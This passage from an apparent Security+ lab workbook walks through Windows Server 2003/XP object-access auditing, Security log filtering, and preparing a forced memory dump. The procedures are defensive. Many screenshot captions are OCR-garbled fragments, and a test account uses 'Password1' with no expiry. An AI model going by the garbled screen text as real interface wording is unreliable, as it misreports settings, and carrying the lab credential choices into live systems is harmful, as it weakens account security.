under way. After that, you begin your detective work. You identify and protect anything
that may be evidence. Then you collect and document that evidence. You review the output
from your sensors, your IDS, your audit logs, and the memory dump from the attacked
system. You examine the system to try to uncover fingerprints left by the attacker,
fingerprints that may lead you to the attacker’s exposure and prosecution.

You’ll explore some of these techniques in this phase. The tasks presented in this phase
may not make you a forensic investigator, but they lead to that path.

The tasks in this phase map to Domains 1, 2, 4, and 6 in the objectives for
TE the CompTIA Security+ exam (www.comptia.org/certifications/1listed/

security.aspx).
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Task 9.1: Configuring an Audit Policy
for Object Access

Auditing is an integral component of security for any system or network. Auditing is the
tracking and recording of events in a log. What events? Well, that’s up to you. An audit
policy can be set on individual systems, configured for groups of systems, or configured
for every system in the enterprise.
Auditing must be set up in advance. If you don’t have auditing turned on before the
event, you won’t have any audited information recorded about the event. You will place
a more elaborate audit policy on systems that are more exposed, on your most critical
infrastructure systems, and on systems that hold your most sensitive information assets.
When you implement an audit policy, you should also configure the Security log in Event
Viewer to increase its size and to avoid overwriting the existing log data. This should be
part of the process as you develop your monitoring plan for the Audit log.

Scenario

You are an administrator in an Active Directory environment. You need to record all
accesses to sensitive content on one of your systems. You are concerned about actual and
attempted access to a folder on a system that contains sensitive documents.

Scope of Task

Duration
This task should take 30 minutes.

Setup

This audit policy should apply to authenticated users and should include Read, Modify,
Create, and Delete access to the file and folder content.

The audited events will be written to the Security log in the Event Viewer application on
the server holding the sensitive content. Completion of Tasks 4.8 and 6.1 is required before
beginning this exercise.

Caveat

Auditing can easily overwhelm a system, a network, and your administrators. Thousands
of events can occur on a system every hour. The system can become so busy recording all
the event details that resources available to service actual client requests become limited.

If you are using a collection and analysis application, these thousands of events—for
numerous systems—must be sent over the network to the central database for storage and
analysis. None of this activity does you any good unless a responsible human is involved to
interpret the output and react if necessary. The monitoring of event logs can consume most,
if not all, of an administrator’s time.
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Auditing should be configured only if you intend to regularly review and use the
information that will be generated from the audit policy.

Procedure

For this task, you will build a new Auditing GPO for object access and link it to the
organizational unit (OU) that contains the system that holds the sensitive content. To
complete the object access auditing, you must configure auditing in the system access
control list (SACL) on the system that holds the sensitive content for the folder where the
critical data is stored.

Equipment Used
For this task, you must have:
= Windows Server 2003 domain controller system

= Windows XP Professional system, which is a member of the domain (the system that
holds the sensitive data)

s Domain Administrator access

Details

Configuring an Auditing GPO for Object Access

1. Log on to the Windows Server 2003 domain controller system as the Domain
Administrator.

2. Select Start » Programs » Administration Tools » Active Directory Users And
Computers (ADUC).

3. In the left pane, expand the domain. Click on the OU named Confidential Servers that
you created in Task 6.1.

4. 1In the left pane, right-click on the OU named Confidential Servers and select
Properties.

5. Select the Group Policy tab.

In Task 6.1, this OU was configured with an IPSec policy to require
TE encrypted communications. You will first disable this policy to avoid any
potential conflicts with this task. If you have already disabled or deleted

this GPO, skip to step 8.

6. Double-click on the IPSec Secure Servers Policy in the area under Disabled. You should
receive a Confirm Disable warning message.
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1.

12.
13.

14.
15.
16.

17.
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Click Yes to confirm that you intend to disable the IPSec GPO.
On the Group Policy tab, click New to create a new GPO.
Name the new GPO Object Access Audit Policy.

On the Group Policy tab, click Edit.

In the left pane, expand Computer Configuration » Security Settings » Local Policies,
and select Audit Policy.

' Group Policy Dbject Editor =] E3

Fil=  Action Wiew Help

- om B @

::j' Object Access Audit Palicy [rio.mobeer.com & | | Palicy  # | Policy Setting |
=-{7) Computer Configuration | e8] Audit account lagan everts hiat Defined
¢l (] Softwiars Settings (8] Audit account management Mot Defined
£ (1 Windows Settings Aud\t directory service access Mok Defined
Seripts (Startup/Shutdown) [88)Audit logon events Mot Defined
Security Settings [88) Audit object access Hot Defined
B g Account _PDIIDES Aud\t policy change Mot Defined
= Local Policies ] i
At Policy Aumt privilege use Mot Defined
: " Aud\t process tracking Mot Defined
User Rights Assignment .
§ Security Dptians [R8]audit system events Mot Defined
2 Event Log
Restricted Groups
-8 System Services
-8 Registry
-8 File System =
1 | 3

In the right pane, double-click on Audit Object Access to open its properties dialog box.
Under Define These Policy Settings, enable the Success and Failure check boxes.

Audit object access Properties

Securty Policy Setting I

v Define these policy settings

Audit object access

Audit theze atternpts:
V¥ Success

¥ Failure

Cancel | Apply |

Click OK to close the Audit Object Access Properties dialog box.
Confirm that Success and Failure are enabled for the Audit Object Access policy.

Next you’ll configure the Security log properties, where the audited events are
recorded. In the Group Policy dialog box, in the left pane select Event Log.

In the right pane, double-click the Maximum Security Log Size Policy.
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Enable the Define This Policy Setting check box, and set the log size to 500032

kilobytes (500 MB). Click OK.

2

&

Maximum security log size Prope 2l
Security Policy Setting I
49

=

i

¥ Defing thiz policy setting

|500032 _I;‘ kilobytes

& Modifping this setting may affect compatibiliby with clients, services,
and applications:
For mare information, se

b arimum security log size

OF. I Cancel Apply

Log file sizes must be in increments of 64 KB. Each event logged adds
approximately 500 bytes to the log file size. Each file access can trigger the
logging of 4-12 events. If you conservatively assume 12 events logged per
file access and 1,000 accesses each day, you get 180 MB per month added
to the Security log for object access in this folder. In this example, you
should schedule to turn the Security log at least once each month.

To turn the log, save the log as a file to a secure location, and then clear
all events on that log in Event Viewer. It is common to generate, and
separately and securely store, an MD5 hash value for each log file to
validate the integrity of the log file, if needed, in the future. This proves
that the log file has not been tampered with since it was generated and

archived. Hashing was discussed briefly in Phase 6 in the VPN/IPSec
exercises.

There are many other events that are written to the Security log and
increase its size. Measure, evaluate, and determine the correct file size

for the Security log in your environment. Adjust this file size as necessary
over time.

19. In the right pane, double-click Prevent Local Guests Group From Accessing Security

Log Policy.

20. Select the Define This Policy Setting check box, and select the Enabled option. Click OK.
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21. In the right pane, double-click the Retention Method For Security Log Policy.

22. Check the Define This Policy Setting check box, and select Do Not Overwrite Events
(Clear Log Manually). Click OK.

Retention method for security log d |

Security Policy Setting I

=__.' Retention method for security log
=D
I Defing thiz policy setting

= Ovenrite events by days

" Dvenrite events as needed

' Do not ovenarite events [clear log manually)

& Madifping this setting may affect compatibility with clients, services,
and applications,
For mare information, see Retention method for security log.
(Q823653)

oK I Cancel | Apply |

23. You will get a Confirm Setting Change warning regarding another policy setting
that can shut down this system if the log files cannot be written to because of the Do
Not Overwrite setting you just defined. You will not be implementing that additional
policy. Click Yes to confirm your Do Not Overwrite setting.

24. Confirm your settings in the Event Log section of the Audit Policy GPO.

il

File  Action View Help
& = [ @(m| 2

_E-j Object Access Audit Policy [rio.mobe *
=) @ Computer Configuration

[ Software Settings

Windows Settings

Scripts {StartupfShutdow

Security Settings

- 2¢ Account Palicies
-8 Local Policies
- Evert Log

{8 Restricted Groups
-8 system Services
@ Registry
@ File System

: 123 Public key Palicies =
A . - 3
| \ |

Maxrmum security log size

Maxrmum system log size Mot defined
Prevent local guests group from accessing application log Mot defined
Prevent local guests group from accessing security log Enabled

Prevent local guests group from accessing system log Mot defined
Retarn application lag Mot defined
Retain security log Mot defined
Retain system log Mot defined
Retentron method For application log Mot defined
Retentron method Far security log Manually

Retentron method For system log Mot defined

25. Close the GPO to save it. Click Close to close the Confidential Servers Properties
dialog box.

Moving the Resource Server into the Proper OU

1. In ADUC, locate the system that holds the sensitive data that you need to implement
auditing on. The default location for all nondomain controller systems is the
Computers container.
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Right-click on the resource server and select Move.

In the Move dialog box, select the Confidential Servers OU and click OK. This places
the resource server into the Confidential Servers OU, making it subject to the new

Auditing policy.
Move object into container.

(& Hardened Servers
2] LostandFound
[ NTDS Quotas
[:I Program Data
-

(2 Computers
(& Confidential Clients
(i
(&3] Domain Contollers
(2] ForsignSecurtyPrincipals
=

Cancel |

4. Confirm that your resource server is now located in the Confidential Servers OU.

In this task, you are using an XP Professional system as the resource
TE server. In the graphic, the resource server is an XP Professional system
named SHOTGUN.

.fl Active Directory Users and Computers

=] B3

@ File Action View ‘window Help | - ﬁ'lﬂ
c= | E@E e XFRRB| R eREVEE
@ Active Directory Users and Computer | Confidential Servers 1 objects
% Saved Queries Name T [ Type | Description |
-Gy mobesr.com [OETSETY Computer

(22 Builtin

-{&8) CLIENTS

D Computers

(&3] Confidential Clients
Fiden 5

{45 Domain Controllers

[=-[_]] ForeignSecuricyPrincipals

{&] Hardened Servers

(23 LostandFound

[ NTDS Quatas

-] Program Data

-] System

D Users

[B-{=3) widget Production

Kl — Bl

5. Close ADUC.
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Refreshing the Group Policies on the XP Professional System

1. Log on to the Windows XP Professional system as the Domain Administrator.
2. Select Start » Run.

3. In the Open field, type gpupdate /force and click OK.

This opens a command window that says Refreshing Policy, and may take
TE a few moments to complete. This reapplies all GPOs that affect the XP

Professional system, right now. Since we relocated the XP Professional
system into a new OU with different GPOs, you want to be certain that the
Auditing GPO is currently applied to, and effective on, this system right

away. The GPO would have automatically refreshed within two hours by
default.

Configuring Auditing for Object Access on the Resource Server
1. On the Windows XP Professional system, launch the Explorer application.

2. In the left pane, expand the folders as necessary to locate the folder named STUFF.
3. Select the STUFF folder.

% D:\STUFF
File Edit Yiew Favorites Tools  Help

aBack'L.)'ﬂ? & XE)|'
Address [ piisTUFF = B
Folders X || Name = I Size: I Type I Date Modified

@ Desktop [Z] ReallyGaodStuFf bxt LKB Text Document 942006 3:30 PM
@ My Documents
El '§ SHOTGUN. MOBEER..COM
5 314 Flappy (A:)
e SY5_BOOT (C:)
= G DATAL (DY)
I an
) Docs
1) msdownld, trap
15 MSOCarhe
I3 RECYCLER
o gt
I System Yalume Information
1) TEMP
1) WlTemp 2
|1 objects (Disk free space: 22,1 GE)

~=1olx|
| [z

),
7 Search

[E:‘ Folders

| v

|5 bytes | :ﬂ Iy Computer v

In Task 4.8, you created a folder named STUFF on an XP Professional

TE system and placed some sensitive content in it. If that folder and content is
still available, use it. If not, create a new folder named STUFF and place a
new text document in it.
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4. Right-click on the STUFF folder and select Properties.

5. On the Security tab, click Advanced. Select the Auditing tab of the Advanced Security
Settings For STUFF dialog box.

Permissions  Auditing |Uwr|er| Effective Permissions |

To view more information about Special auditing entries, select an auditing entry, and then click Edit

Auditing entnes:
Type | MName | ACCess | Inkerited From | Apply Ta |
Add.. Edit... I Femove I

I Inherit from parent the auditing entries that apply to child objects. Inchude these with entries explicitly
defined here.

I~ Replace auditing entries on all child objects with entries shown here that apply to child objects

[ ok ]| cenee | e |

6. Click Add to build the SACL to implement auditing on this folder.
7. In the Select User, Computer, Or Group dialog box, click Advanced.

Select User, Computer, or Group 21

Select this object type:

ILlser. Group, or Built-in security principal Object Types... I

From this location:

Irnohaer.com Locations... |

Enter the object name ta select [examples)

| Check Names I

Advanced.. | oK Cancel |

%

8. Click the Find Now button to display a list of users, computers, and groups in the
domain.

9. Select Authenticated Users from the resulting Name (FQDN) list. Click OK to accept
Authenticated Users.
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Select User, Computer, or Group ﬂil

Select thiz object type:

IUser, Group, or Built-in security principal Object Types...

From this location:
Imubeer.cum Locations...

Commaon Hueries |

Hame: IStarls with d I ﬂl
Desorption: [Starts wih =] |
™ Disabled accaunts Stop |

™ Man expiting password

Days since last logom: I 'I

&

coon |

Mame [RDN] ‘ E-bdail Address‘ Drescription | In Falder ‘ =
%7WP[Ud7TEmD|&|E mobeer.com/widget Production
%Admimsnatnr Built-in acco. mobesr comn.Users

@ Anorymous Logan
o
icals g

8 Batch

m Cert Publishers tfembers of t...  mobeer.com/Users
!ﬂ Clients DLG mobeer.com/CLIENTS
!ﬂ Clients GG mabesr.com/CLIENTS

*f7 CN=Digest Authentication
8 CH=NTLM Authertication
8 CH=Other Drgarization =

10. In the Select User, Computer, Or Group dialog box, click OK to close the dialog box.

11. In the resulting Auditing Entry For STUFF dialog box, select Successful and Failed for
the following access types:

= List Folder/Execute File

s Create Files/Write Data

s Create Folders/Append Data
s Delete Subfolders And Files

s Delete
With the Auditing GPO linked to the OU that contains the system holding
A TE sensitive content, these settings will audit successful and attempted

access for all authenticated users. Access types being audited include
Read, Modify (Write), Create, and Delete accesses to the file and folder
content. These auditing attributes will now be inherited by all newly
created content in the STUFF folder by default.

12. Confirm your settings, and click OK to close the Auditing Entry For STUFF
dialog box.
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13. In the Advanced Security Settings For STUFF dialog box, enable the Replace Auditing
Entries On All Child Objects With Entries Shown Here That Apply To Child Objects
check box.

With this setting enabled, these auditing attributes will now be inherited by
TE all existing and newly created content in the STUFF folder.
2

Permissions  Auditing |Dwner| Efferctive Permissions |

T o wigw mare infarmation sbout Special suditing entries, select an auditing entry, and then click E dit

Auditing entries:

Type [ Hame [ Access [ Inherited From | Apply To
All Luthenticated Users Special <nat inheriteds This folder, subfold...
Add... Edit... Femove

I Inherit from parent the auditing entries that apply to child objects. Include these with entries explicitly
defined here.

¥ Replace auditing entries on all child objects with entries shown here that apph to child objscts

0K | camcel | sppy |

14. Click OK to close the Advanced Security Settings For STUFF dialog box.

You may see a progress dialog box that monitors the writing of the new
TE SACL attributes to all existing content in the STUFF folder. This could take

quite a while if the folder contains numerous files and folders.

2 If this folder is accessed a lot, the auditing processes can consume massive

ING resources on this system and degrade system performance severely.
Auditing should only be configured if you intend to regularly review and use
the information that will be generated from the audit policy.

Criteria for Completion

You have completed this task when you have built a new Auditing GPO that is linked to
the Confidential Servers OU and configured the SACL on the sensitive-content folder on the
server (the XP Professional system in this case) holding the sensitive content.
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Task 9.2: Reviewing the Audit Logs

Once you have completed the implementation of an audit policy, you must implement a
standard monitoring routine. This is often a huge challenge. Audit logs are recorded in the
Security log in Event Viewer and can record thousands of events each day, or even each
hour. You may have many systems to monitor, and this easily becomes an overwhelming
task. Many organizations acquire third-party software to retrieve, analyze, and report
on audited events for a network environment. These software tools are essential in many
cases, and can cost just a little—or a lot.

Securing your audit logs is a major concern as well. The employee agreement for all
network administrators should include a requirement that every log must be saved to a
specified archive location, and failure to properly save a log (like clearing the log without
saving it) should be grounds for termination. Highly restrictive permissions should be
placed on these log files to allow only a rare few, highly trusted administrators access to
this content. In many industries, regulatory compliance laws require the secure retention
of these logs for many years and may require proof that the log files have not been
altered since they were generated. (Integrity validation is typically accomplished with the
use of hashing algorithms, like MD5, SHA1, or SHA2.) You should know what these
requirements are for your organization.

Scenario

You are an administrator in an Active Directory environment. You are concerned about
actual and attempted access to a folder on a system that contains sensitive documents.
You have implemented an Object Access audit policy to log these accesses, including Read,
Modify, Create, and Delete access to the file and folder content for authenticated users.

You must now establish a routine to identify unauthorized access attempts to determine
if and when this attack occurs.

Scope of Task

Duration
This task should take 30 minutes.

Setup

You implemented an audit policy on authenticated users that tracks Read, Modify, Create,
and Delete access to the file and folder content in the STUFF folder.

The audited events are being written to the Security log in the Event Viewer application,
on the server holding the sensitive content. Completion of Task 9.1 is required before
beginning this exercise.
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Caveat

Auditing can easily overwhelm a system, a network, and your administrators. Thousands
of events can occur on a system every hour. The system can become so busy recording all
the event details that resources available to service actual client requests become scarce.
If you are using a collection and analysis application, these thousands of events—for
numerous systems—must be sent over the network to the central database for storage and
analysis. None of this activity does you any good unless a responsible human is involved
to interpret the output, and react if necessary. The monitoring of event logs can consume
most, if not all, of an administrator’s time.

Auditing should be configured only if you intend to regularly review the information
that will be generated from the audit policy for the purposes of violation detection, and for
identifying corrective actions that need to be implemented to further secure the sensitive
content.

Procedure

For this task, you will create a new user in the domain. You will then configure permissions
on the STUFF folder to deny access to the new user. You will create some content in the
STUFF folder as the Administrator, who has sufficient permissions to create content.

Next you will log on to the system as the new user and attempt to access the STUFF
folder. Of course, you should receive Access Denied errors. This should trigger Failed
Access events in the Security log.

Finally, you will log on as the Administrator and open Event Viewer. You will see many
events in the log. You will build a filter to view successful accesses, and another filter to
view only failed accesses to the STUFF content.

Equipment Used
For this task, you must have:
= Windows Server 2003 domain controller system

= Windows XP Professional system, a member of the domain (the system that holds the
sensitive data from Task 9.1)

s Domain Administrator access

= Completion of Task 9.1

Details
Creating a New User Account

1. Log on to the Windows Server 2003 domain controller system as the Domain
Administrator.

2. Select Start » Programs » Administration Tools » Active Directory Users And
Computers (ADUC).
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In the left pane, expand the domain. Click on the container named Users.
In the left pane, right-click on the container named Users and select New » User.
Type the name BoBo2 in the First Name and User Logon Name fields. Click Next.

Enter the password Password1 in both the Password and Confirm Password fields.
Clear the User Must Change Password At Next Logon check box and enable the
Password Never Expires check box. Click Next.

Click Finish to confirm the creation of the new user BoBo2.

Log off the Windows Server 2003 domain controller system.

Configuring Permissions on the XP Professional System

1. Log on to the Windows XP Professional system as the Domain Administrator.
2. Launch Windows Explorer.
3. In the left pane, expand the folders as necessary to locate the folder named STUFF.
4. Seclect the STUFF folder.
In Task 9.1, you configured a folder named STUFF with an audit policy for
TE Object Access, Success, and Failure.
Right-click on the STUFF folder and select Properties.
On the Security tab, click Add to configure deny permissions for BoBo2.
21x]
Genera\l Sharing  Security |Web Sharing Eustom\ze'
G[DUD Or user names:
[eiiDer
ﬂEEveryDne
Add Remove
Permizsions for Deny All DLG Al Dery
Full Contral O =
Madify m]
Read & Execute [m}
List Folder Contents O
Fead O
Wi m]
T |
Eﬁé:iadc:’ljn%z‘;mssmns of for advanced settings. Advanced
ok I Cancel | Apply |
7. In the Select Users, Computers, Or Groups dialog box, click Advanced.
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8. Click Find Now to display domain users, computers, and groups.
9. Select BoBo2 from the Name (FQDN) list. Click OK.

Select this abject type:

IUsers, Groups. of Builtin security principals Obiject Types

From this location:

mobeer com Locations

Commen Gueries |

Mame: [stants with =] | m‘
Desoipiion. [Statswith =] |
™ | Disabled accounts stop

™| Wan expiing password

[aps sihce |58t lagon: -

&

oK | Cancel
Wame (ADM) | E-Mail Address | Deseription | In Folder I =
€& _wFiod_Tem.. mobeer. comAwi..
€53 &dmiristratar Bluiltin account . mobeer comdLls
* Anonpmous L.
* futhenticated
'ﬂ' Batch
o
m Ceart Publishers Members of this .. mobeer.comdUs..
€7 Clients DLG mobeer.com/CL.
€7 Clients G robesr com/CLI

* CN=Digest Au...
“ CN=NTLM Au

.

[

10. Click OK in the Select Users, Computers, Or Groups dialog box to add BoBo2 to the
discretionary access control list (DACL) for the STUFF folder.

X

Select Users, Computers, or Groups 2=l

Select thiz object type:

IUsars, Groups, or Built-in security principals Object Types...

Frarn this location:

Imnheer com Locations...

Enter the object names to select [examples]:
BoBio? [BoBaZ@mabesr. cam Check Names

Cancel

Rl

Advanced. . |

v

11. On the Security tab of the STUFF Properties dialog box, with BoBo2 selected in the
top pane, enable the Deny check box for Full Control in the bottom pane. This denies
all access to BoBo2 for any content in the STUFF folder.

If you have completed Task 5.5 on this system, you could have placed
TE BoBo2 into the Deny All GG that was created in that task to accomplish
the same level of restrictive permissions.

12. Click OK to close the STUFF Properties dialog box.
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Triggering the Audit Policy on the STUFF folder for Audit Success

1.

While logged in to the Windows XP Professional system as the Domain Administrator,
in the right pane of the STUFF folder in Windows Explorer, right-click on white space
and select New > Folder. Name the folder AdminStuff.

Double-click on the AdminStuff folder. In the right pane, right-click on white space
and select New > Text Document. Name the document AdminStuff. txt.

¥ D:\STUFF\AdminStuff

Fle Edt Wew Favortes Tooks Help ‘3’

@Backvov Jﬁ [EFn\der;“.}ij le‘-

Address |ﬁ| DAASTURF|AdminStufF B Go

Foldsrs x | [ame = [ size [ Type | Date Madified
(& Desktop = | ) ndminstuff, b OKE TextDocument  10j9/2006 6:13PM
() My Documents
B ' SHOTGUM, MOBEER.COM
A 344 Floppy ()
“® SYS_BOOT (C:)
) g2 DATAL (D)
=T i
Cpocs
(2 msdowrld.tmp
() MSOCache
|25) RECVCLER
B 2 5TUFF
159 Adminstuff
() System Yalume Information =

[
p Search

1 objects (Disk free space: 22,1 GE)

[0 bytes |4 My Computer v

Edit the contents of AdminStuff.txt with the Notepad application. Save the changes
and exit Notepad.

Create two more documents: AdminStuff2.txt and AdminStuffDel.txt. Edit and save
these documents.

Delete AdminStuffDel. txt.

Close the Explorer application and log off the XP Professional system.

Triggering the Audit Policy on the STUFF Folder for Audit Failure
1.

2
3.
4

Log on to the Windows XP Professional system as BoBo2, with the password Password1.
Launch Windows Explorer.

In the left pane, expand the folders as necessary to locate the folder named STUFF.
Select the STUFF folder. You should receive an Access Denied error.

B D\ M=
File Edt ‘View Favorites Tools Help -2
Qex - Q- (T O search |[2 Foders | [FH-
address [a D2y v B
Folders x

@ Desktop ~

My Documents

= 'J My Computer
L 3% Floppy (A1)
e 5Y5_BOOT (1)
= < DATAL (D1}

[SE) Q D:\STUFF is not accessible.
@ oocs fccess is dered.

12 msdownid. trp

153 MeoCache

I RECYCLER L

159 sTUFF

I System Wolums InFormation
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Click OK to clear the Access Denied error.

Select other folders on the system, and try to select the STUFF folder again. You
should receive an Access Denied error again.

Click OK to clear the Access Denied error.

8. Log off the XP Professional system as BoBo2.

Reviewing the Security Log (Audit Log) on the XP Professional System

1. Log on to the Windows XP Professional system as the Domain Administrator.

2. Select Start » Run. Type Eventvwr in the Open field and click OK to launch the Event
Viewer application.

3. In the left pane, select the Security log. Notice that in the example there are already
914 events in this newly configured log.

JRET
File Action YWiew Help
&~ | E[m] 2
@ Event Yiewer (Local) Security  Filkered view showing 914 of 914 eventis)
-4 Application Type | Date | Time | Source | categor Event | User | Computer | i’
L dsuccess Audit  10/2§2006 6:43:29 PM  Security Object Access 562 TopDog SHOTEUN
dsuccess Audit  10/2§2006 6:43:29 PM  Security Object Access 567 TopDog SHOTEUN
dsuccess Audit  10/2§2006 6:43:29 PM  Security Object Access 560 TopDog SHOTEUN
dﬁuccess Audit 10942006 6:41:17 PM  Security Object Access 562 SYSTEM SHOTGUN
dﬁuccess Audit 10942006 6:41:17 PM  Security Object Access 567 SYSTEM SHOTGUN
dﬁuccess Audit 10942006 6:41:17 PM  Security Object Access 560 SYSTEM SHOTGUN
dsuccess Audit  10/9§2006 641117 PM Security Object Access 56z SYSTEM SHOTGUN
dsuccess Audic 10942006 6141117 PM Security Object Access 56T SYSTEM SHOTGEUN
dsuccess Audic 10942006 6141117 PM Security Object Access 560 SYSTEM SHOTGEUN
dsuccess Audic 10942006 6141117 PM Security Object Access 56z SYSTEM SHOTGEUN
dsuccess Audic 10942006 6141117 PM Security Object Access 56T SYSTEM SHOTGEUN
dsuccess Audit 10942006 641117 PM Security Object Access 560 SYSTEM SHOTGEUN
dsuccess Audit 10942006 641117 PM Security Object Access 56z SYSTEM SHOTGEUN =l

TE

TE

4. In the left pane, right-click on the Security log and select Properties. Select the

Filter tab.

Your system will show a different number and different types of events.

You'll notice that the object access Event IDs are 560, 562, and 567. By
correlating the timestamps, you should also notice that these three Event
IDs represent a single access event, like a read or a write or a delete. This
could take some time to review and interpret, especially after logging
events for a long period of time.
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5. Disable the Information, Warning, Error, and Failure Audit check boxes. In the User
field, enter the username TopDog, the administrator for the domain.
General Fiker |
Eventtypes
I™ Information J¥ Success audt
I” Waming I” Failure audit
™ Enor
Event source: ][AII] ;I
Category: |iam =l
Event[D: |
User. [TopDog
Computer |
From: | First Event =l 9 s/2008 | [111@c0Pm =
To.  [LastEvent =] [10r sv2008 -] [ s4328PM =
Restore Defaults |
oK |
6. Click OK to apply the filter and view the filtered Security log.

H Event Viewer

File  Action View Help
e~ a@ERB 2

1] Event Viewer (Local)
i Application
[

Security  Filtered view showing 630 of 914 event(s)
[ Type [ Date | source Category
@fsuccess Audit  10/9/2006 Security Object Acces:
#Suwess Audit  10/9/2006 Security Object Acces:

l Time:
6:43:29PM
6:43:29 PM

Notice that this filter still only knocks down the number of events by about
one-third in the example. Your results may be different.

2

7. In the left pane, right-click on the Security log and select Properties. Select the Filter
tab. This time add the Event ID of 560.
8. Double-click on the top event. In the graphic, notice the upper portion. This shows a

Success Audit, Object Access for the user TopDog, and that TopDog was accessing the
object from the computer named SHOTGUN. (In this case, TopDog was logged on
locally to the resource server.) Your events should look similar, but with different times
and names.
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21|
Event |
Date: 15 Source:  Securit
Time: E:4329PM  Categany: Db|acliccess ;I
Tppe, Success b Ewent|D: BB0 + |
User: MOBEERT oplrag
Computer: SHOTGUM
Crezcription:
Object Open j
Object Server: Security
Object Type: File
Object Name: D:ASTUFRF
Handle IDx 458
Operation 10 {0,2214175}
Frocess |D: 2532
Image File Mame:  C:NwWINDOWShesplorer. exe
Primary User Mame: Tophiog
Primary Domain: ~ MOBEER 5|
Distar 6 Bytes € w/ords
=
=l
’TI Cancel | Apply |

9. Notice the Description field. It shows that the object was accessed by the explorer.exe
application, and the user accessed the D:\STUFF folder.

10. As you scroll down, you will see that the access type was listing the contents of the
STUFF directory.

11. Select the down arrow in the upper-right corner of the Event Properties dialog
box to scroll down the list of 560 events for TopDog. Review the details of several
of these events. Locate the DELETE event where you deleted the AdminStuffDel
.txt file.

12. In the left pane, right-click on the Security log and select Properties. Select the Filter
tab. This time change the Event ID to 567. Click OK to apply the filter.

13. Double-click on the top event. Select the down arrow in the upper-right corner of the
Event Properties dialog box to scroll down the list of 567 events for TopDog. Review
the details of several of these events. Locate a WriteData event where you saved one
of the AdminStuff. txt files.

Notice the time selection, and the From and To filters. These would help
TE you isolate for a specific time period.

14. In the left pane, right-click on the Security log and select Properties. Select the Filter
tab. This time disable Success Audit, enable Failure Audit, change the Event ID to 560,
and clear the User field.

15. Click OK to apply the filter.
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i x|

File Action View Help
& = @] |2
@ Ewent Wiewer {Local) Security  Filkered view showing & of 914 event(s)
~§t] Application Type [ Date [ Time [ Source [ Categor Event | User [ Camputer [

Syatem @ Failure Audit  10/9j2006 63522 PM Security Object Access 560 BoBo2 SHOTGEUN
L @ Failure Audit  10/9j2006 6:37141 PM Security Object Access 560 BoBo2 SHOTGEUN
@ Failure Audit  10/9j2006 6137135 PM Security Object Access 560 BoBo2 SHOTGEUN
@ Failure Audit  10/9/2006 6:36:05 PM Security Object Access =) BoBo2 SHOTEUN
% Failure Audit  10/9/2006 6:3HE7PM Security Object Access =) BoBo2 SHOTEUN
% Failure Audit  10/242006 6:30:17 PM Security Object Access 560 METWOR,,,  SHOTGUM

16. Double-click on the top event. Select the down arrow in the upper-right corner of the
Event Properties dialog box to scroll down the list of the Failure Audit events with
the Event ID of 560. Review the details of several of these events.

These would be indications of users who were trying to access content

TE that they should not be accessing. Fortunately, permissions stopped their
access, but perhaps it might be a good idea to pose a question or two to
their supervisor, or to them (BoBo2 in this case) directly, just to let them
know that you know. Repeated incidents could be cause for reprimand, or
even termination. Document these incidents and the warnings issued to
the users in case you need to justify more serious punishment for repeat
offenders.

17. In the left pane, right-click on the Security log and select Properties. Select the Filter
tab. This time, enable all settings: Information, Earning, Error, Success Audit, and
Failure Audit, and clear all the fields below by clicking the Restore Defaults button.

2 Failure to reset the filter could easily cause misinterpretation of the event
ING logs by hiding critical events. Be sure this filter gets reset to its original
default.

18. Close Event Viewer.

Criteria for Completion

You have completed this task when you have generated some audit events, both success and
failure, interrogated the Security log in the Event Viewer application, applied several filters
to isolate the types of events you were looking for, and then reset the Security Log filter to
its original default settings.
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Task 9.3: Forcing a Memory Dump

The memory dump takes the contents of physical random access memory (RAM)
and writes it to a file on the hard drive, to serve as a persistent copy for later analysis.
Memory dumps may be useful for two main purposes: debugging problematic applications
(not our issue here) and investigating an attack incident. As a record of what was going
on in RAM, it can reveal to the trained analyst many details of the interactions among
applications and between applications and the operating system. Many forms of exploit
software—the type of code used in viruses, worms, Trojans, and so forth—implement
code that interacts with applications and the operating system in an atypical manner.
This software attempts to interact in ways that it should not. Understanding the method of
attack, or the attack vector, is essential in developing the proper defense against this form
of attack.

Most forensic investigation guidelines declare that this memory dump is an essential
component of a post-incident investigation. This seems to contradict the other golden
rule of incident investigation: to pull the plug on the system, and go down “dirty” to
avoid altering the contents of the hard drive(s). But this book isn’t here to debate forensic-
investigation issues. That is for the company Chief Information Security Officer (CISO)
and the CIRT policies to define. At this point, it is important to know how to accomplish
the task.

Sophisticated forensic investigators have tools and techniques to gather this information
without violating the integrity of the hard drives, but these tools can be quite expensive and
the procedures require specialized training and rehearsal.

Scenario

You are operating a system and you suspect that it might have a virus. You observe several
unexpected systemic activities that concern you, and you hope to gather information to
identify what might be going on in the system.

Scope of Task

Duration
This task should take 20 minutes.

Setup

The function of forcing the memory dump is not built into the operating system by default.
This capability must be added by editing the Registry and rebooting the system. This
means that you must have this capability in place on each system where you desire the
forced memory dump prior to needing to utilize this feature.
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Caveat

In Task 9.3, you will be editing the Registry, which is always dangerous. The forced
memory dump performs an abnormal shutdown, an “abend,” or abnormal end
(termination). It is a “dirty” shutdown and it does not properly close files and applications.
This can corrupt many types of critical files that are being accessed by the system, and can
cause the loss of data in files you have open. If your hardware includes any type of write
or disk caching, shutting the system down dirty can cause serious problems regarding
data loss and file system corruption. If you have either hardware or software disk caching
enabled, to avoid this risk you may not want to perform this task.

If you elect to proceed, you should have backups of your data, and you should generate
a system restore point before editing the Registry, and a second restore point before
performing the forced memory dump, just in case.

% To review the manual creation of a system restore point, see Task 10.3.
TE

Procedure

First you’ll configure the memory dump in system properties to get the desired amount of
information and specify the location of the output file.

You must then perform an edit in the Registry and reboot the system to have the change
mounted by the operating system. After the reboot, you’ll launch an application or two—
nothing too important or volatile, though.

Then you’ll push the magic buttons. Boom! Blue screen! This is followed by a reboot.

After the reboot completes, you’ll open and examine the contents of the dump file. There
may not be much to see by the untrained eye. Much of the file contains machine language
code that is not human-readable. There is a series of analytical tools that experts use
to extract the most detail out of these files. This investigative procedure almost always
includes sending this memory dump file to one of these types of individuals or companies
for the hard-core analysis.

Recognize that this Registry edit and reboot must be configured on your systems prior
to an attack. If the attack has occurred before these settings are in place, this technique
cannot be used to capture the contents of RAM.

Equipment Used
For this task, you must have:
= Windows XP Professional system, a member of the domain

= Administrator access

Details
Configuring the Minidump

1. Log on to the Windows XP Professional system as the Administrator.
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2. Right-click on My Computer and select Properties.

System properties are also available by choosing the System applet in the
TE Control Panel.

3. Click the Advanced tab.

System Properties 21
System Restore | Automatic Updates Remote |
General | Computer Marme I Hardware Advanced

“r'ou must be logged on as an Administrator to make most of these changes.

i~ Performance

Visual effects, processor scheduling, memany usage, and virtual memary

